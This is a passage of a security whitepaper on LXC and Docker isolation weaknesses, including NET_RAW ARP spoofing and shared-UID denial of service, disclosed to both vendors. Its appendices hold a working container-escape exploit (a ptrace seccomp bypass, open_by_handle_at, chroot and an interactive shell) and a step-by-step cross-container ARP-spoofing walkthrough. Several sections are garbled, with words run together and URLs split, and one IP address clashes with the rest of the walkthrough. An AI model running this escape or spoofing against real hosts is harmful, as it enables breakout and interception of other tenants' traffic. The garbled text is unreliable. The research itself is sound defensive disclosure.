While the next two issues have been documented before by other researchers, they represent subtly insecure defaults with large impacts, and so the author believes they merit further discussion. On a positive note, in response to the disclosure of these issues, the LXC team will be updating their security page to mention them [60], which should hopefully bring them to the attention of more developers and administrators using LXC.

NET_RAW abuse

A common configuration for companies offering PaaS solutions built on containers is to have multiple customers' containers running on the same physical host. By default, both LXC and Docker set up container networking so that all containers share the same Linux virtual bridge. These containers will be able to communicate with each other. Even if this direct network access is disabled (using the --icc=false flag for Docker, or using iptables rules for LXC), containers aren't restricted at the link layer. In particular, it is possible (and in fact quite easy) to conduct an ARP spoofing attack on another container within the same host system, allowing full middle-person attacks on the targeted container's traffic. A full walkthrough of this attack is presented in "Appendix: Cross-Container ARP Spoofing Walkthrough".

The author reported this issue to both LXC and Docker [61][62]. As referenced in the responses to the bug report, this is not a particularly new issue. It has been documented in both LXC [63][64][65] and Docker [66][67][68], as well as in other products such as OpenSwitch [69], and in OpenStack Neutron, where it was previously an issue [70] and was then fixed [71].

The LXC team recommends a number of solutions [61], including:

- Using LXD with OpenStack to manage container networking
- Using libvirt to manage the MAC tables of bridges/containers
- Using a separate virtual bridge per trust zone or per container

The Docker team simply recommends dropping NET_RAW [62].
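Whether a container can perform the link-layer attack described above largely comes down to whether it can open a raw packet socket. The sketch below (hypothetical name) only opens and closes an AF_PACKET socket for ARP frames, without sending anything. The kernel allows this only with CAP_NET_RAW in the user namespace that owns the container's network namespace, which is why root in an unprivileged LXC container passes this check unless NET_RAW is dropped.

```c
/* Illustrative sketch; packet_socket_allowed() is a hypothetical name. */
#include <arpa/inet.h>
#include <errno.h>
#include <sys/socket.h>
#include <unistd.h>
#include <linux/if_ether.h>

/* Try to open a raw AF_PACKET socket that receives ARP frames, the
 * primitive an ARP-spoofing container needs. Nothing is sent or received.
 * Returns 1 if the socket could be opened, or -errno if it could not. */
int packet_socket_allowed(void)
{
    int fd = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ARP));

    if (fd < 0)
        return -errno;
    close(fd);
    return 1;
}
```

Following the Docker team's recommendation of dropping NET_RAW (for example, docker run --cap-drop=NET_RAW), this function should return -EPERM inside the container.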
Denial of Service Attacks

User namespaces work by "sliding" UIDs between the user namespace (the container) and the root namespace (the host). For example, on a default LXC install, UID 0 inside the container becomes UID 100000 on the host. However, the default across both LXC and Docker is to use the same UID slide for all unprivileged containers. In other words: identical UIDs of processes inside different containers will translate to identical host UIDs, just shifted up by a constant slide (i.e. all processes running as root inside any container are running with UID 100000 on the host). This condition raises the possibility of per-user ulimits being hit, since these areas of the kernel are not user namespace aware. Note that these same denial-of-service (DoS) conditions occur without user namespaces as well (as the same condition of shared host UIDs applies).
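The "slide" is visible in /proc/<pid>/uid_map, whose lines have the form "<first UID inside> <first UID outside> <count>". The following sketch (hypothetical names) parses such a line and translates a container UID into the host UID, assuming a mapping of "0 100000 65536" to match the example above (the count of 65536 is an assumption; it depends on the configured subordinate UID range).

```c
/* Illustrative sketch; struct uid_extent and the functions are hypothetical. */
#include <stdio.h>

/* One line of /proc/<pid>/uid_map: "<inside-start> <outside-start> <count>". */
struct uid_extent {
    unsigned long inside, outside, count;
};

int parse_uid_extent(const char *line, struct uid_extent *e)
{
    return sscanf(line, "%lu %lu %lu", &e->inside, &e->outside, &e->count) == 3
               ? 0 : -1;
}

/* Map a UID inside the namespace to the UID seen outside it.
 * Returns -1 if this extent does not cover `uid`. */
long uid_to_host(const struct uid_extent *e, unsigned long uid)
{
    if (uid < e->inside || uid - e->inside >= e->count)
        return -1;
    return (long)(e->outside + (uid - e->inside));
}

/* Same, using every extent of the calling process's own uid_map (the
 * outside values are then relative to the parent user namespace). */
long own_uid_to_host(unsigned long uid)
{
    FILE *f = fopen("/proc/self/uid_map", "r");
    char line[128];
    struct uid_extent e;
    long host = -1;

    if (f == NULL)
        return -1;
    while (host == -1 && fgets(line, sizeof line, f) != NULL)
        if (parse_uid_extent(line, &e) == 0)
            host = uid_to_host(&e, uid);
    fclose(f);
    return host;
}
```

Two containers configured with the same map would both translate their root user to host UID 100000, so the per-user limits discussed next are charged against a single shared budget.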
Examples demonstrating these issues are available in "Appendix: Denial of Service Proof-of-Concept Code".

Pending Signals: This is a per-user limit on the maximum number of pending signals that can be queued among all of a user's processes. A process running in one container can queue up the maximum number of pending signals, preventing processes in other containers from receiving pending signals. From testing, this affected both LXC and Docker.

POSIX Message Queues: This limits the maximum amount of kernel resources that can be used on POSIX message queues. A process running in one container can exhaust all available POSIX message queue memory, preventing processes in other containers from creating, or sending messages to, POSIX message queues. From testing, this worked on LXC and Docker.

Max User Processes: This is a per-user limit on the maximum number of processes. This can easily be exploited to create a simple DoS against other containers, as well as (sometimes) the host. From testing, this attack was very successful on LXC (and was able to bring down my whole host), while on Docker it was only able to bring down all Docker containers (the host remained stable). Note that Linux 4.3 has added the ability to limit PID resources through cgroups [72][73], which should make it easier for container systems to mitigate this issue.

Max Files: This is a per-user limit on the maximum number of file descriptors that can be open. On both LXC and Docker, this is an easy way to DoS other containers running on the same host.
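These limits can be inspected with getrlimit(2). The sketch below (hypothetical names) prints the four limits discussed above and parses the pids.max file of the pids cgroup controller mentioned under Max User Processes. Where pids.max lives depends on how cgroups are mounted on a given host, so reading it is left to the caller.

```c
/* Illustrative sketch; print_limits() and parse_pids_max() are hypothetical. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/resource.h>

struct named_limit {
    const char *name;
    int resource;
};

/* Per setrlimit(2), RLIMIT_NPROC, RLIMIT_SIGPENDING and RLIMIT_MSGQUEUE are
 * counted against the real UID, so containers whose processes map to the
 * same host UID share one budget. RLIMIT_NOFILE is applied per process. */
static const struct named_limit limits[] = {
    { "RLIMIT_NPROC",      RLIMIT_NPROC },
    { "RLIMIT_SIGPENDING", RLIMIT_SIGPENDING },
    { "RLIMIT_MSGQUEUE",   RLIMIT_MSGQUEUE },
    { "RLIMIT_NOFILE",     RLIMIT_NOFILE },
};

static void print_value(rlim_t v)
{
    if (v == RLIM_INFINITY)
        printf(" unlimited");
    else
        printf(" %llu", (unsigned long long)v);
}

/* Print the soft and hard value of each limit above. */
void print_limits(void)
{
    for (size_t i = 0; i < sizeof limits / sizeof limits[0]; i++) {
        struct rlimit rl;

        if (getrlimit(limits[i].resource, &rl) != 0)
            continue;
        printf("%-18s", limits[i].name);
        print_value(rl.rlim_cur);
        print_value(rl.rlim_max);
        putchar('\n');
    }
}

/* Parse the contents of a pids cgroup "pids.max" file (Linux 4.3+), which
 * holds either a number or the word "max". Returns the limit, -1 for "max"
 * (no limit), or -2 if the text cannot be parsed. */
long parse_pids_max(const char *text)
{
    char *end;
    long v;

    if (strncmp(text, "max", 3) == 0)
        return -1;
    v = strtol(text, &end, 10);
    if (end == text || v < 0)
        return -2;
    return v;
}
```

A container system that gives each container its own pids cgroup with a finite pids.max caps a fork bomb at that value, instead of relying on the shared per-UID RLIMIT_NPROC.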
Beyond ulimits, two other DoS conditions are often exploitable in container systems:

Disk Space: Perhaps (aside from a fork bomb) the simplest DoS against container systems is to fill up disk space. From testing, this worked on LXC and Docker. Unlike some of the other DoS attacks presented here, which may often bring down the host or introduce enough instability to make themselves difficult to clean up, this one offers the simplest way to create a DoS and then clean it up quickly. Combined with the PID Namespacing Info-Leak, this could allow an attacker container to target other tenants on a shared host, selectively creating DoS conditions only when certain other containers or processes were running.

Global File Descriptor Limits: The system maintains a limit on the maximum number of file descriptors available overall (available at /proc/sys/fs/file-max, which, as discussed earlier, containers cannot write to). If containers are not sharing a UID map, and have a ulimit set on the number of file descriptors they can open, a container can still attempt to DoS the host (and other containers) by opening the maximum number of FDs allowed as each user in its user namespace, providing a greatly amplified ability to consume FDs. This is generally a "last line" DoS, and would only be attempted if mitigations for other (simpler) vectors are put in place.
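Both of these shared resources can be watched from inside a container. The sketch below (hypothetical names) parses /proc/sys/fs/file-nr, whose three fields are the number of allocated file handles, the number allocated but unused, and the system-wide maximum, and uses statvfs(3) to compute how much of a filesystem is still available to unprivileged users.

```c
/* Illustrative sketch; all three function names are hypothetical. */
#include <stdio.h>
#include <sys/statvfs.h>

/* Parse /proc/sys/fs/file-nr: allocated handles, allocated-but-unused
 * handles, and the system-wide maximum (the same value as file-max).
 * Returns 0 on success, -1 on malformed input. */
int parse_file_nr(const char *text, unsigned long long *allocated,
                  unsigned long long *unused, unsigned long long *max)
{
    return sscanf(text, "%llu %llu %llu", allocated, unused, max) == 3 ? 0 : -1;
}

/* Percentage of blocks on the filesystem containing `path` that are still
 * available to unprivileged users, or -1.0 on error. */
double percent_available(const char *path)
{
    struct statvfs sv;

    if (statvfs(path, &sv) != 0 || sv.f_blocks == 0)
        return -1.0;
    return 100.0 * (double)sv.f_bavail / (double)sv.f_blocks;
}

/* Print both figures for the running system. */
void print_shared_resources(const char *path)
{
    FILE *f = fopen("/proc/sys/fs/file-nr", "r");
    char buf[128];
    unsigned long long a, u, m;
    double p;

    if (f != NULL) {
        if (fgets(buf, sizeof buf, f) != NULL &&
            parse_file_nr(buf, &a, &u, &m) == 0)
            printf("file handles: %llu allocated of %llu\n", a, m);
        fclose(f);
    }
    p = percent_available(path);
    if (p >= 0.0)
        printf("%s: %.1f%% of blocks available\n", path, p);
    else
        printf("%s: statvfs failed\n", path);
}
```

Polling these values periodically is a cheap way for an operator to notice one tenant steadily consuming disk space or file handles before other tenants are affected.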
NCCGroup|Page12Copyright2016NCCGroupConclusionContainersystemsarerapidlyimprovingtheirsecurity,and,withtheireaseofusefordevelopers,don'tappeartobegoingawayanytimesoon.
BothLXCandDockerofferproductsthat(whenusedcorrectly)providereasonablystrongsecurityandisolationforpotentiallyhostileorcompromisedapplications.
However,neitherofthemissecurewithoutproperconfiguration,especiallyinenvironmentswheremultipletenantsarerunningonthesamehost,andsogreatcareneedstobetakentosecureandauditcontainersystems.
NewproductssuchasLXD[74],OpenStack[75],andKubernetes[76]areattemptingtoprovide"full"solutionsformanagingandsecuringcontainers.
Comingfromadifferentangle,Intel'sClearContainer[77][78]projectaimstomixhardwarevirtualizationwithcontainers,improvingspeed,andeliminatingtheneedforasharedkernel,throughminimalhypervisors.
Asthesesystemscontinuetoevolve,itseemslikelythattherewillbebothgreatlyimprovedbase-hardening,aswellasgreatlyexpandedattacksurfaces,sothefutureofcontainersecurityisnothingifnotinteresting.
AcknowledgementsI'dliketothankTimNewshamforthecodeinAppendix:PrivilegedLXCEscapePoC,AaronAdamsforcodeAppendix:/proc/bus/pci,AaronGrattafioriforhishelpwithreviewingcontent,JeffDileoforpointingouthowtocombineDoSandInfoleakstocausegreathavoc,andJakeHeath,JackLeadford,JustinEngler,andJeremiahBlatzfortheir(heroic)effortsincopyeditingmybrainmushintoacoherentpaper.
AppendixCodeAsmanyoftheappendicescontainlongcodesegments,allcodeintheappendiceshasbeenpackagedinaseparatetarballforthereader'sconvenience,availablehere:XXX.
FurtherReadingIhighlyrecommendthefollowing(innoparticularorder)forbothunderstandingcontainersandcontainersecurity:http://www.
slideshare.
net/jpetazzo/anatomy-of-a-container-namespaces-cgroups-some-filesystem-magic-linuxconhttps://lwn.
net/Articles/531114/http://www.
haifux.
org/lectures/299/netLec7.
pdfhttps://www.
stgraber.
org/2013/12/20/lxc-1-0-blog-post-series/https://major.
io/wp-content/uploads/2015/08/Securing-Linux-Containers-GCUX-Gold-Paper-Major-Hayden.
pdfhttp://arxiv.
org/pdf/1501.
02967.
pdfhttps://www.
nccgroup.
trust/globalassets/our-research/us/whitepapers/2016/april/ncc_group_understanding_hardening_linux_containers-10pdfNCCGroup|Page13Copyright2016NCCGroupReferences[1]https://lwn.
net/Articles/531114/.
[2]https://lwn.
net/Articles/524952/.
[3]http://man7.
org/linux/man-pages/man7/namespaces.
7.
html.
[4]https://deis.
com/blog/2015/isolation-linux-containers.
[5]http://lwn.
net/Articles/543273/.
[6]https://medium.
com/@ewindisch/linux-user-namespaces-might-not-be-secure-enough-a-k-a-subverting-posix-capabilities-f1c4ae19cad#.
tboeuds6z.
[7]https://linuxcontainers.
org/lxc/security/.
[8]https://blog.
docker.
com/2016/02/docker-engine-1-10-security/.
[9]https://access.
redhat.
com/documentation/en-US/Red_Hat_Enterprise_Linux/6/html/Resource_Management_Guide/ch01.
html.
[10]http://www.
slideshare.
net/jpetazzo/anatomy-of-a-container-namespaces-cgroups-some-filesystem-magic-linuxcon.
[11]https://github.
com/lxc/lxc/blob/master/config/templates/common.
conf.
in#L21.
[12]https://github.
com/opencontainers/runc/blob/master/libcontainer/SPEC.
md.
[13]http://man7.
org/linux/man-pages/man7/capabilities.
7.
html.
[14]https://github.
com/lxc/lxc/blob/master/config/templates/common.
conf.
in#L13.
[15]https://www.
kernel.
org/doc/Documentation/security/LSM.
txt.
[16]https://wiki.
ubuntu.
com/AppArmor.
[17]http://man7.
org/linux/man-pages/man5/lxc.
container.
conf.
5.
html.
[18]https://docs.
docker.
com/engine/security/security.
[19]https://www.
kernel.
org/doc/Documentation/prctl/seccomp_filter.
txt.
[20]https://github.
com/lxc/lxc/blob/master/config/templates/common.
seccomp.
[21]https://github.
com/jfrazelle/docker/blob/d34bbb66d5d5f2f07b8f0c1b63df5f058f20b436/daemon/execdriver/native/seccomp_default.
go.
[22]https://github.
com/lxc/lxc/blob/master/config/apparmor/abstractions/container-base.
[23]https://github.
com/docker/docker/blob/master/profiles/apparmor/template.
go.
[24]https://github.
com/lxc/lxc/blob/master/config/apparmor/lxc-generate-aa-rules.
py.
[25]https://github.
com/lxc/lxc/blob/master/config/apparmor/container-rules.
[26]http://www.
mpipks-dresden.
mpg.
de/~mueller/docs/suse10.
1/suselinux-manual_en/manual/sec.
udev.
kernel.
html.
[27]http://blog.
bofh.
it/debian/id_413.
[28]http://linux.
die.
net/man/8/modprobe.
[29]http://kaivanov.
blogspot.
com/2010/09/all-you-need-to-know-about-procsys.
html.
[30]http://man7.
org/linux/man-pages/man5/core.
5.
html).
[31] https://access.redhat.com/documentation/en-US/Red_Hat_Enterprise_Linux/4/html/Reference_Guide/s2-proc-kcore.html
[32] http://linux.die.net/man/4/kmem
[33] https://www.centos.org/docs/5/html/5.1/Deployment_Guide/s2-proc-sysrq-trigger.html
[34] https://www.kernel.org/doc/Documentation/sysrq.txt
[35] https://www.kernel.org/doc/Documentation/filesystems/debugfs.txt
[36] https://lwn.net/Articles/429323/
[37] https://lwn.net/Articles/429321/
[38] https://wiki.archlinux.org/index.php/Unified_Extensible_Firmware_Interface
[39] http://www.phoronix.com/scan.php?page=news_item&px=UEFI-rm-root-directory
[40] https://lwn.net/Articles/153366/
[41] http://wiki.apparmor.net/index.php/Kernel_interfaces#securityfs_-_.2Fsys.2Fkernel.2Fsecurity.2Fapparmor
[42] https://access.redhat.com/documentation/en-US/Red_Hat_Enterprise_Linux/6/html/Deployment_Guide/s2-proc-dir-sys.html
[43] http://man7.org/linux/man-pages/man2/init_module.2.html
[44] http://linux.die.net/man/2/finit_module
[45] http://man7.org/linux/man-pages/man2/delete_module.2.html
[46] http://man7.org/linux/man-pages/man2/kexec_load.2.html
[47] http://man7.org/linux/man-pages/man2/open_by_handle_at.2.html
[48] http://www.openwall.com/lists/oss-security/2014/06/18/4
[49] http://www.openwall.com/lists/oss-security/2014/06/24/16
[50] https://medium.com/@fun_cuddles/docker-breakout-exploit-analysis-a274fff0e6b3#.5omzcmg6z
[51] https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1511197
[52] http://www.tldp.org/HOWTO/IO-Port-Programming-2.html
[53] http://linux.die.net/man/2/inb
[54] https://lkml.org/lkml/2015/6/13/191
[55] https://www.kernel.org/doc/Documentation/prctl/seccomp_filter.txt
[56] https://gist.github.com/thejh/8346f47e359adecd1d53
[57] https://docs.docker.com/engine/installation/linux/ubuntulinux/
[58] https://help.ubuntu.com/lts/serverguide/lxc.html
[59] https://github.com/docker/docker/pull/21263
[60] https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1548497/comments/3
[61] https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1548497
[62] Email communications between the author and Diogo Mónica from Docker.
[63] https://lists.linuxcontainers.org/pipermail/lxc-users/2011-May/002025.html
[64] http://events.linuxfoundation.org/sites/events/files/slides/secure-lxc-networking.pdf
[65] https://www.berrange.com/posts/2011/10/03/guest-mac-spoofing-denial-of-service-and-preventing-it-with-libvirt-and-kvm/
[66] https://nyantec.com/en/2015/03/20/docker-networking-considered-harmful/
[67] http://arxiv.org/pdf/1501.02967.pdf
[68] https://github.com/docker/docker/issues/8951#issuecomment-61817262
[69] http://people.clarkson.edu/~bullrl/classes/CS657/bullrl_CS657_project.pdf
[70] https://bugs.launchpad.net/neutron/+bug/1274034
[71] https://review.openstack.org/#/c/196986/
[72] http://lxr.free-electrons.com/source/kernel/cgroup_pids.c?v=4.3
[73] http://lists.openwall.net/linux-kernel/2015/04/12/7
[74] https://linuxcontainers.org/lxd/
[75] https://www.openstack.org/software/
[76] https://github.com/kubernetes/kubernetes
[77] https://clearlinux.org/features/clear-containers
[78] https://lwn.net/Articles/644675/
[79] http://lxr.free-electrons.com/source/fs/fhandle.c?v=3.14#L178
[80] http://lxr.free-electrons.com/source/kernel/capability.c?v=3.14#L429
[81] https://www.vagrantup.com/
[82] https://atlas.hashicorp.com/ubuntu/boxes/trusty64
[83] http://man7.org/linux/man-pages/man2/timer_create.2.html
[84] https://www.vmware.com/products/workstation
Appendix: Privileged LXC Escape PoC

The following code demonstrates how ptrace(2) can be used to bypass seccomp. This allows the use of open_by_handle_at(2), which in turn allows escaping from a privileged container. While this technique can still be used to disable seccomp inside unprivileged LXC containers, the escape itself fails there: a security check in the open_by_handle_at(2) system call uses the `capable()` function [79], which performs capability checks against the root user namespace [80].
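The core of the bypass is a register shuffle at the syscall-enter-stop: the child issues `syscall(SYS_getpid, real_nr, args...)`, which the seccomp filter lets through as an ordinary getpid(2), and the tracer then moves the first argument into the syscall-number slot and shifts the remaining arguments down by one register. The sketch below isolates that step as a pure function so it can be reasoned about without ptrace. `struct syscall_regs` and `shuffle_syscall_args` are hypothetical names; the struct is an assumed stand-in for the x86-64 fields of `struct user_regs_struct`.

```c
#include <stdint.h>

/* Hypothetical stand-in for the x86-64 fields of struct user_regs_struct
 * that the PoC touches (the real struct comes from <sys/user.h>). */
struct syscall_regs {
    uint64_t orig_rax;                    /* syscall number at syscall-enter-stop */
    uint64_t rdi, rsi, rdx, r10, r8, r9;  /* syscall arguments 1..6 */
};

/* Turn syscall(marker_nr, nr, a1, a2, a3, a4, a5) into syscall nr(a1..a5):
 * the first "argument" becomes the syscall number and the rest shift down
 * one register, as in the tampering loop of the PoC.
 * Returns 1 if the registers were rewritten, 0 if this was not the marker. */
int shuffle_syscall_args(struct syscall_regs *r, uint64_t marker_nr)
{
    if (r->orig_rax != marker_nr)
        return 0;
    r->orig_rax = r->rdi;
    r->rdi = r->rsi;
    r->rsi = r->rdx;
    r->rdx = r->r10;
    r->r10 = r->r8;
    r->r8 = r->r9;
    r->r9 = 0;
    return 1;
}
```

In the PoC the same rewrite is applied to the live registers with PTRACE_GETREGS/PTRACE_SETREGS before the kernel dispatches the call.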
This entire seccomp bypass vector is blocked by Docker by disallowing ptrace(2) inside containers:

    /*
     * @author Tim Newsham
     * use ptrace to bypass seccomp rule against open_handle_at
     * and use open_handle_at to get a handle on the REAL root dir
     * and then chroot to it.
     * This escapes privileged lxc container.
     *
     * gcc -g -Wall secopenchroot.c -o secopenchroot
     * ./secopenchroot /tmp "02 00 00 00 00 00 00 00"
     *
     * assuming that the real root has file handle "02 00 00 00 00 00 00 00"
     */
    #define _GNU_SOURCE /* must precede all includes: struct file_handle, MAX_HANDLE_SZ */
    #include <stdio.h>
    #include <stdlib.h>
    #include <ctype.h>
    #include <errno.h>
    #include <fcntl.h>
    #include <signal.h>
    #include <unistd.h>
    #include <sys/types.h>
    #include <sys/wait.h>
    #include <sys/ptrace.h>
    #include <sys/user.h>
    #include <sys/syscall.h>

    /* parse space-separated two-digit hex bytes into buf; returns count or -1 */
    int getDat(char *p, unsigned char *buf)
    {
        char *ep;
        int n, val;

        n = 0;
        while (*p) {
            while (isspace(*p))
                p++;
            val = strtoul(p, &ep, 16);
            if (ep != p + 2)
                return -1;
            p = ep;
            buf[n++] = val;
            while (isspace(*p))
                p++;
        }
        return n;
    }

    void attack(char *fn, char *dat)
    {
        unsigned char buf[16 + MAX_HANDLE_SZ];
        struct file_handle *fp = (struct file_handle *)buf;
        int n, mfd, fd;

        fp->handle_type = 1;
        n = getDat(dat, fp->f_handle);
        if (n == -1) {
            printf("bad data!\n");
            exit(1);
        }
        fp->handle_bytes = n;
        mfd = open(fn, 0);
        if (mfd == -1) {
            perror(fn);
            exit(1);
        }
        // fd = open_by_handle_at(mfd, fp, 0);
        /* issued as getpid(); the tracing parent rewrites it into open_by_handle_at */
        fd = syscall(SYS_getpid, SYS_open_by_handle_at, mfd, fp, 0);
        if (fd == -1) {
            perror("open_by_handle");
            exit(1);
        }
        printf("opened %d\n", fd);
        fchdir(fd);
        chroot(".");
        system("sh -i");
    }

    /* step to start or end of next system call */
    int sysStep(int pid)
    {
        int st;

        if (ptrace(PTRACE_SYSCALL, pid, NULL, NULL) == -1) {
            perror("ptrace syscall");
            return -1;
        }
        if (waitpid(pid, &st, __WALL) == -1) {
            perror("waitpid");
            return -1;
        }
        // printf("status %x\n", st);
        if (!(WIFSTOPPED(st) && WSTOPSIG(st) == SIGTRAP))
            return -1;
        return 0;
    }

    void dumpregs(int pid)
    {
        struct user_regs_struct regs;

        if (ptrace(PTRACE_GETREGS, pid, NULL, &regs) == -1)
            return;
        printf("rip %016llx ", regs.rip);
        printf("rsp %016llx ", regs.rsp);
        printf("efl %016llx\n", regs.eflags);
        printf("rax %016llx orig %016llx ", regs.rax, regs.orig_rax);
        printf("rdi %016llx\n", regs.rdi);
        printf("rsi %016llx ", regs.rsi);
        printf("rdx %016llx ", regs.rdx);
        printf("rcx %016llx\n", regs.rcx);
        printf("r8 %016llx ", regs.r8);
        printf("r9 %016llx ", regs.r9);
        printf("r10 %016llx\n", regs.r10);
        printf("\n");
    }

    int main(int argc, char **argv)
    {
        struct user_regs_struct regs;
        int pid;

        if (argc != 3) {
            printf("bad usage\n");
            exit(1);
        }
        switch ((pid = fork())) {
        case -1:
            perror("fork");
            exit(1);
        case 0:
            /* child: get traced and do our attack */
            ptrace(PTRACE_TRACEME, 0, NULL, NULL);
            kill(getpid(), SIGSTOP);
            attack(argv[1], argv[2]);
            exit(0);
        }

        /* parent: translate getpid calls into other syscalls. max 4 args. */
        waitpid(pid, 0, 0); /* wait for attach */
        while (sysStep(pid) != -1) {
            /* potentially tamper with syscall */
            if (ptrace(PTRACE_GETREGS, pid, NULL, &regs) == -1) {
                perror("ptrace getregs");
                break;
            }
            /*
             * note: we won't get a syscall-enter-stop for any
             * seccomp filtered syscalls, just the syscall-exit-stop.
             */
            if (regs.rax != -ENOSYS) /* not a syscall-enter-stop! */
                continue;
            if (regs.orig_rax == SYS_getpid) {
                regs.orig_rax = regs.rdi;
                regs.rdi = regs.rsi;
                regs.rsi = regs.rdx;
                regs.rdx = regs.r10;
                regs.r10 = regs.r8;
                regs.r8 = regs.r9;
                regs.r9 = 0;
                printf("syscallX %llu, before tampering\n", regs.orig_rax);
                dumpregs(pid);
                ptrace(PTRACE_SETREGS, pid, NULL, &regs);
                printf("after tampering\n");
                dumpregs(pid);
            }
            // printf("before\n"); dumpregs(pid);
            if (sysStep(pid) == -1) /* go to syscall exit */
                break;
            // printf("after\n"); dumpregs(pid);
        }
        return 0;
    }

Appendix: Cross-Container ARP Spoofing Walkthrough

The following was performed on a default LXC installation [58], and reported to LXC and Docker with a full write-up and reproduction, which was made public by the LXC team [61].
This reproduction is for an LXC system, but it can easily be adapted to a Docker system instead.
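arpspoof works, roughly, by repeatedly sending forged ARP replies that tell a victim "this IP address is at my MAC address". As a minimal sketch of what such a frame contains, assuming the RFC 826 layout for Ethernet and IPv4, the hypothetical helper below builds the 42-byte frame that would poison the host's cache in this walkthrough (victim 10.0.3.1, spoofed address 10.0.3.159, attacker MAC e6:ad:42:7a:f1:54). Actually transmitting it would need a raw AF_PACKET socket, which requires CAP_NET_RAW.

```c
#include <stdint.h>
#include <string.h>

#define ARP_FRAME_LEN 42 /* 14-byte Ethernet header + 28-byte ARP payload */

/* Build an Ethernet frame carrying an ARP reply (opcode 2) that claims
 * "spoofed_ip is at attacker_mac", addressed to the victim. Multi-byte
 * fields are big-endian; IPv4 addresses are 4 raw bytes in network order.
 * Returns the number of bytes written. */
size_t build_arp_reply(uint8_t out[ARP_FRAME_LEN],
                       const uint8_t attacker_mac[6],
                       const uint8_t victim_mac[6],
                       const uint8_t spoofed_ip[4],
                       const uint8_t victim_ip[4])
{
    uint8_t *p = out;

    /* Ethernet header: destination, source, EtherType 0x0806 (ARP). */
    memcpy(p, victim_mac, 6);   p += 6;
    memcpy(p, attacker_mac, 6); p += 6;
    *p++ = 0x08; *p++ = 0x06;

    /* ARP payload. */
    *p++ = 0x00; *p++ = 0x01;           /* hardware type: Ethernet */
    *p++ = 0x08; *p++ = 0x00;           /* protocol type: IPv4 */
    *p++ = 6;                           /* hardware address length */
    *p++ = 4;                           /* protocol address length */
    *p++ = 0x00; *p++ = 0x02;           /* opcode: reply */
    memcpy(p, attacker_mac, 6); p += 6; /* sender MAC: the forged binding */
    memcpy(p, spoofed_ip, 4);   p += 4; /* sender IP: the address being hijacked */
    memcpy(p, victim_mac, 6);   p += 6; /* target MAC */
    memcpy(p, victim_ip, 4);    p += 4; /* target IP */

    return (size_t)(p - out);
}
```

Because the bridge forwards this frame like any other, nothing at layer 2 distinguishes it from a genuine reply, which is why the host's cache in the walkthrough ends up pointing both container addresses at container A.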
    # first, we set up an Ubuntu VM w/ vagrant
    vagrant init ubuntu/trusty64
    vagrant up
    vagrant ssh

    # Now, inside the new Ubuntu VM:
    apt-get update
    apt-get install lxc

    # set up two unprivileged LXC containers
    # (from https://help.ubuntu.com/lts/serverguide/lxc.html)
    mkdir -p ~/.config/lxc
    echo "lxc.id_map = u 0 100000 65536" > ~/.config/lxc/default.conf
    echo "lxc.id_map = g 0 100000 65536" >> ~/.config/lxc/default.conf
    echo "lxc.network.type = veth" >> ~/.config/lxc/default.conf
    echo "lxc.network.link = lxcbr0" >> ~/.config/lxc/default.conf
    echo "$USER veth lxcbr0 2" | sudo tee -a /etc/lxc/lxc-usernet
    lxc-create -t download -n a -- -d ubuntu -r trusty -a amd64
    lxc-create -t download -n b -- -d ubuntu -r trusty -a amd64

    # fix cgroup issues (from https://github.com/lxc/lxc/issues/181)
    for c in hugetlb cpuset cpu cpuacct memory devices freezer blkio perf_event; do
        sudo dbus-send --print-reply --address=unix:path=/sys/fs/cgroup/cgmanager/sock \
            --type=method_call /org/linuxcontainers/cgmanager org.linuxcontainers.cgmanager0_0.Create \
            string:$c string:$USER
        sudo dbus-send --print-reply --address=unix:path=/sys/fs/cgroup/cgmanager/sock \
            --type=method_call /org/linuxcontainers/cgmanager org.linuxcontainers.cgmanager0_0.Chown \
            string:$c string:$USER int32:$(id -u) int32:$(id -g)
        dbus-send --print-reply --address=unix:path=/sys/fs/cgroup/cgmanager/sock \
            --type=method_call /org/linuxcontainers/cgmanager org.linuxcontainers.cgmanager0_0.MovePid \
            string:$c string:$USER int32:$$
    done

    # start the containers
    lxc-start -n a -d
    lxc-start -n b -d

    # open two new terminal windows
    # in one: attach to container A
    lxc-attach -n a
    # in another: attach to container B
    lxc-attach -n b

    # from now on, all commands will have the full command prompt to make it clear
    # where they are being run

    # look at the ARP tables on the host:
    root@vagrant-ubuntu-trusty-64:~# arp -a
    ? (10.0.2.2) at 52:54:00:12:35:02 [ether] on eth0
    ? (10.0.3.159) at e2:33:5d:33:cf:07 [ether] on lxcbr0
    ? (10.0.3.246) at e6:ad:42:7a:f1:54 [ether] on lxcbr0
    ? (10.0.2.3) at 52:54:00:12:35:03 [ether] on eth0

    # in this case, 10.0.3.159 is container B's eth0, and 10.0.3.246 is container A's eth0
    # since the two containers are on the same subnet, it may appear that they can
    # sniff each other's traffic. so...
    # a quick demonstration that you cannot normally sniff traffic on the wire
    # just by virtue of being on the same subnet:
    # in container A
    root@a:/# tcpdump -i any -vv -n dst host 10.0.3.159
    # in container B
    root@b:/# nc -lv 8888
    # on the host (type something in the nc session, and note no traffic
    # is output in container A)
    vagrant@vagrant-ubuntu-trusty-64:~$ nc 10.0.3.83 8888

    # now, we will demonstrate the ability to sniff traffic with ARP spoofing
    # in container A:
    # install dsniff
    apt-get update
    apt-get install dsniff
    # ARP spoof the host:
    arpspoof -t 10.0.3.1 10.0.3.159 &>/dev/null
    # look at the ARP tables on the host and note that 10.0.3.159 and 10.0.3.246
    # both now point at the MAC address for container A:
    root@vagrant-ubuntu-trusty-64:~# arp -a
    ? (10.0.2.2) at 52:54:00:12:35:02 [ether] on eth0
    ? (10.0.3.159) at e6:ad:42:7a:f1:54 [ether] on lxcbr0
    ? (10.0.3.246) at e6:ad:42:7a:f1:54 [ether] on lxcbr0
    ? (10.0.2.3) at 52:54:00:12:35:03 [ether] on eth0

    # note that container B can no longer access the internet
    # (the following command will hang):
    root@b:/# apt-get install curl

    # now, from container A, we can ARP spoof container B as well:
    root@a:/# arpspoof -t 10.0.3.159 10.0.3.1 &>/dev/null
    # look at the arp tables in container B and note
    # 10.0.3.1 now points to container A:
    root@b:/# arp -a
    a (10.0.3.246) at e6:ad:42:7a:f1:54 [ether] on eth0
    ? (10.0.3.1) at e6:ad:42:7a:f1:54 [ether] on eth0

    # Finally, we can try to send some traffic from the host to container B,
    # and sniff it from container A
    # in B
    root@b:/# nc -lv 8888
    # in A:
    root@a:/# apt-get install tcpdump
